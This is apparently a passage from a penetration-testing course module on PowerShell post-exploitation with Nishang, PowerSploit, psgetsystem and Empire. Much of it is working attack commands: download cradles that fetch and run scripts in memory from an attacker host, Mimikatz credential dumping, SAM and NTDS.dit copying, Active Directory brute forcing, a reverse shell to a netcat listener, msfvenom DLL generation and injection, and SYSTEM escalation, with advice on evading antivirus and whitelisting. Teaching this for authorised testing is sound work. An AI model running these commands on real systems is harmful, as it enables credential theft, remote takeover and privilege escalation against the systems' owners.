Post-Exploitation With Powershell

Now that we’ve covered some remote Information Gathering and Recon methods with PowerSploit and Posh-SecMod, let’s explore some other tools we can utilize for Post-Exploitation, which is where our ability to leverage PowerShell really starts to shine.

First, let’s explore another excellent post-exploitation framework, known as “Nishang,” by Nikhil Mittal. Nishang brings together some of the best tools from other frameworks, in addition to Nishang-native tools as well.

IMPORTANT:

As we mentioned previously about Antivirus and the detection of powershell and other exploitation frameworks, Nishang is no exception, and its various modules will likely be detected if imported directly to the target system.

Therefore, it’s important to make sure that most of the tools and scripts we invoke should be invoked via download cradles that support in-memory execution. For most of the examples that follow, we’ll be using the Net.WebClient and DownloadString method to execute our scripts in memory. Once we’ve hosted the Nishang framework scripts on our attacker system, we can begin.

======================================================================

Let’s explore some of the “Gather” modules. These modules will help us get information from our target system locally, that we could potentially use to move laterally for instance.

The “Copy-VSS” module will attempt to copy the SAM database using the VSS service, and if run on a domain controller, will try and copy the NTDS.dit and contents of the SYSTEM registry hive. We can try it with the following command:

PS C:\> iex (New-Object Net.Webclient).DownloadString(“http://attacker_url/Copy-VSS.ps1"); Copy-VSS

The “Get-Information” cmdlet will get us a good deal of system information including:

• PuTTY trusted hosts
• PuTTY Saved sessions
• Recently used commands
• Shares on the target machine
• Environment Variables
• Current user details
• SNMP information
• Installed applications
• Domain Name
• Content of hosts file
• Running Services
• Account Policy
• Local Users
• Local Groups
• WLAN Info

We can download and execute it in memory with our Net.Webclient DownloadString download cradle:

iex (New-Object Net.WebClient).DownloadString('http://attacker/Get-Information.ps1'); Get-Information

Get-PassHints we can use to dump the saved Password Hints for users on the system:

iex (New-Object Net.WebClient).DownloadString('http://attacker/Get-PassHints’); Get-PassHints

The Invoke-Mimikatz cmdlet will dump clear-text credentials (or hashes) from memory. Note, that we can also pass command line parameters to any of the modules that have additional options as part of our download cradle commands:

iex (New-Object Net.WebClient).DownloadString('http://attacker/Invoke-Mimikatz’); InvokeMimikatz -DumpCreds

There are plenty of other very useful Nishang “gather” modules which will come in handy for our post-exploitation purposes, explore!

https://github.com/samratashok/nishang#gather

As part of its catalog, Nishang includes a great brute force tool “Invoke-BruteForce.” We can use this to brute force Active Directory accounts, SQL Server, Web or FTP servers. The great thing about a brute force tool written in PowerShell is that we can execute the attack from our target host as long as we copy a file containing usernames and passwords to our target.

PS C:\> Invoke-BruteForce –ComputerName targetdomain.com –UserList C:\temp\users.txt –PasswordList C:\temp\pwds.txt –Service ActiveDirectory –StopOnSuccess -Verbose

The “Invoke-PowerShellTcp” cmdlet within the Nishang framework provides an excellent way to obtain a reverse PowerShell shell from our target host back to a netcat listener.

Keep in mind that if using this method, take into consideration that the traffic is traversing the wire in cleartext between attacker and target.

Although a great and undetected (by Antivirus) method to get a reverse shell from PowerShell, over-the-wire heuristics (SIEM) may pick up some of the back and forth chatter if that type of solution has been implemented within an organization.

To use this, we should first fire up a netcat listener on our attacker machine. We’ll configure it on port 4444 for this example.

Next, we can simply invoke it using a download cradle from the target system, this time, from a windows command prompt on the target.

C:\> powershell.exe –Command iex (New-ObjectNet.WebClient).DownloadString(‘http://<attacker_URL>/Invoke-PowerShellTcp.ps1’); Invoke-PowerShellTcp -Reverse -IPAddress <listener_IP> -Port 4444

There are several different shells, both bind, reverse, ICMP, UDP shells, and some more complex “rat”-type shells we can utilize from Nishang. Experiment with the different types:

Invoke-JSRatRegsvr.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRegsvr.ps1
Invoke-JSRatRundll.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRundll.ps1
Invoke-PoshRatHttp.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttp.ps1
Invoke-PoshRatHttps.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttps.ps1
Invoke-PowerShellIcmp.ps1: https://github.com/samratashok/nishang/blob/master/Shells/InvokePowerShellIcmp.ps1
Invoke-PowerShellTcp.ps1: https://github.com/samratashok/nishang/blob/master/Shells/InvokePowerShellTcp.ps1
Invoke-PowerShellTcpOneLine.ps1: https://github.com/samratashok/nishang/blob/master/Shells/InvokePowerShellTcpOneLine.ps1
Invoke-PowerShellTcpOneLineBind.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLineBind.ps1
Invoke-PowerShellUdp.ps1: https://github.com/samratashok/nishang/blob/master/Shells/InvokePowerShellUdp.ps1
Invoke-PowerShellUdpOneLine.ps1: https://github.com/samratashok/nishang/blob/master/Shells/InvokePowerShellUdpOneLine.ps1
Invoke-PowerShellWmi.ps1: https://github.com/samratashok/nishang/blob/master/Shells/InvokePowerShellWmi.ps1
Invoke-PsGcat.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcat.ps1
Invoke-PsGcatAgent.ps1: https://github.com/samratashok/nishang/blob/master/Shells/InvokePsGcatAgent.ps1
Remove-PoshRat.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Remove-PoshRat.ps1

In addition to the “Gather” and other modules we’ve covered, we can find a script for mostly any phase of our post-exploitation within the Nishang Framework with utilities in the following categories:

ActiveDirectory: https://github.com/samratashok/nishang/tree/master/ActiveDirectory
Antak-WebShell: https://github.com/samratashok/nishang/tree/master/Antak-WebShell
Backdoors: https://github.com/samratashok/nishang/tree/master/Backdoors
Bypass: https://github.com/samratashok/nishang/tree/master/Bypass
Client: https://github.com/samratashok/nishang/tree/master/Client
Escalation: https://github.com/samratashok/nishang/tree/master/Escalation
Execution: https://github.com/samratashok/nishang/tree/master/Execution
Gather: https://github.com/samratashok/nishang/tree/master/Gather
MITM: https://github.com/samratashok/nishang/tree/master/MITM
Misc: https://github.com/samratashok/nishang/tree/master/Misc
Pivot: https://github.com/samratashok/nishang/tree/master/Pivot
Prasadhak: https://github.com/samratashok/nishang/tree/master/Prasadhak
Scan: https://github.com/samratashok/nishang/tree/master/Scan
Shells: https://github.com/samratashok/nishang/tree/master/Shells
Utility: https://github.com/samratashok/nishang/tree/master/Utility

Seeing as we’ve previously covered several tools within the PowerSploit framework for the purpose of information gathering (the Invoke-PortScan and Get-HttpStatus tools specifically), we should also cover some of the tools it provides in regards to postexploitation as well.

As with other frameworks, there are several categories in PowerSploit we can use for our post-exploitation purposes:

• AntivirusBypass
• Code Execution
• Exfiltration
• Mayhem
• Persistence
• Privesc
• Recon
• ScriptModification

One which we should cover here, and offers a good starting point in the identification of misconfigurations which could lead to privilege escalation, is the “PowerUp” module within the “Privesc” category.

We can first import the Privesc.psm1 module from within the Privesc modules directory and have a look at some of the options we have:

PS C:\Modules\PowerSploit\Privesc> Import-Module .\Privesc.psm1
PS C:\> Get-Command –Module Privesc

We can see the PowerUp module has plenty of options for us to explore. Of course, we can run any one of those functions or scripts independently, but this module includes an “Invoke-AllChecks” function.

Invoke-AllChecks will run all functions related to the Privesc module looking for misconfigurations, permissions issues with services, opportunities for DLL hijacking a number of other useful checks.

PS C:\Modules\PowerSploit\Privesc> Invoke-AllChecks

The output will also indicate an “AbuseFuntion” we can use to further exploit the target. In the case with the following example, PowerUp identified a potential service binary we can install with the “InstallServiceBinary –Name ‘ClickToRunSvc’ command.

PowerUp also gives us the option to save all results to an HTML file with the -HTMLReport flag and will generate an HTML file we can use to investigate any paths to privilege escalation. The file will be saved in the current directory Invoke-AllChecks was run from and will be in “MACHINENAME.USERNAME.html” naming format.

PS C:\> Invoke-AllChecks -HTMLReport

The “CodeInjection” category in PowerSploit gives us some options in regards to several methods we can inject our own code into existing processes on the target system, whether it be via DLL injection, injecting our own custom Shellcode into an existing process, or using WMI to execute commands on the target.

The first requirement, of course, is that we generate a DLL for demonstration purposes. This can be done in a number of ways, but most commonly, we can just use Metasploit’s msfvenom to generate one with the following command:

msfvenom -p windows/exec CMD=“cmd.exe” -f dll > cmd.dll

The DLL will need to be downloaded to the target. This can be done in any number of ways we’ve covered in this module. We can use the Net.WebClient “DownloadFile” download cradle method for that.

PS C:\> iex (New-Object Net.Webclient).DownloadFile(‘http://attacker_URL/cmd.dll’,‘C:\programdata\cmd.dll’)

we’re downloading our cmd.dll file into the “C:\Programdata\” folder on the target.

We should next identify a process on the target system we’d like to inject our DLL into. We can simply run the “ps” command from the powershell console. In this example, we’ll run the “ps” command with a where-object statement to look for a process that matches “notepad,” and we’ll inject our DLL into that process (reference figure to the right). In this case, we’ve identified three processes matching the “notepad” string, and we’ll choose the one with Pid “7420” for our DLL Injection.

PS C:\> ps | ? {$_.ProcessName -match “notepad"}

Once we’ve downloaded our DLL to the target, and identified the process we’re going to inject into, in this example, we’ve chosen the notepad.exe process ID 7420, we can use another download cradle (this time “DownloadString” method) to download and execute the “Invoke-DLLInjection.ps1” script from our attacker system, along with the correct arguments for injecting our DLL into that existing process.

PS C:\> iex (New-Object Net.Webclient).DownloadString(‘http://attacker_URL/InvokeDLLInjection.ps1); Invoke-DLLInjection –ProcessID 7420 C:\programdata\cmd.dll

Once that is complete, if we run the “ps” command again, we can confirm that we now have a “cmd” process which has been spawned from our DLL Injection operation, which is created in a new process thread.

A great explanation of the basics of how DLL injection works can be found here:

http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html

Another excellent PowerShell tool we’d like to mention by decoder-it is “psgetsystem” and can be downloaded here:

https://github.com/decoder-it/psgetsystem

Psgetsystem allows us to get SYSTEM privileges via a parent process, which then spawns a child process which effectively inherits the SYSTEM access privileges of the parent.

Although this tool needs to be run as Administrator, it’s a great way to evade application whitelisting solutions by being able to inject ourselves into an already signed or other trusted process.

Let’s see it in action. Once we’ve downloaded the psgetsys.ps1 script to our target, we can source it and execute its class function with the following commands:

PS C:\> . .\psgetsys.ps1
PS C:\> [MyProcess]::CreateProcessFromParent(<system_pid>,”<command_to_execute>”)

But before we do that, we need to identify some SYSTEM processes and choose one we can “piggyback” onto. We can use the following command to find those:

PS C:\> Get-Process -IncludeUserName | Where-Object {$_.UserName -match "SYSTEM"} |Format-List –Property Username,Name,Id

Now that we have a PID for a SYSTEM-owned process (3632 in this case), we can continue with our execution of psgetsystem. For demonstration purposes, we’ll instruct psgetsystem to run “cmd.exe” within the ZeroConfigService process 3632. This will launch a cmd.exe prompt, but as a child process of the SYSTEM-owned ZeroConfigService.exe process, and as a result, our “child” process, will also be SYSTEM.

PS C:\> . .\psgetsys.ps1
PS C:\> [MyProcess]::CreateProcessFromParent(3632,”cmd.exe”)

Empire is another great post-exploitation framework which we’ll briefly describe here but will cover in greater detail in a video accompanying this module.

Its main advantage is that it implements powershell functionality without requiring the existence of powershell on a target machine. It is in a world of its own in regards to other frameworks in that it utilizes its own built-in listeners, agents and modules to compromise and conduct all facets of post-exploitation from information gathering to privilege escalation, lateral movement, persistence and also integrates with the Metasploit Framework.

You can learn more about Empire here:

https://github.com/EmpireProject/Empire/wiki/Quickstart

Make sure to check out the video included with this module for a walkthrough of its capabilities.